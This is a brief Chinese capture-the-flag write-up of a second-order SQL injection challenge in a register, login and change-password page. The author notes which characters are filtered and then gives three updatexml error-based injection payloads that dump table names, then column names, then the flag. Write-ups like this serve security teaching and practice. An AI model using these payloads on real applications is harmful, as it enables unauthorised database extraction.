2020 易林博“停课不停赛，以赛促学” SQLI

这个页面太丑了，三个功能，注册、登入、改密码，一般这种涉及多次数据库操作的基本都是二次注入。测试用户名处

注册用户：ccc”

密码：ccc

改密码的时候报错了

多测试测试，过来了空格、/*、and……直接报错注入最方便了

ccc"||updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),0x7e),1)#

ccc"||updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name=flag)&(table_schema=database())),0x7e),1)#

ccc"||updatexml(1,concat(0x7e,(select(flag)from(flag)),0x7e),1)#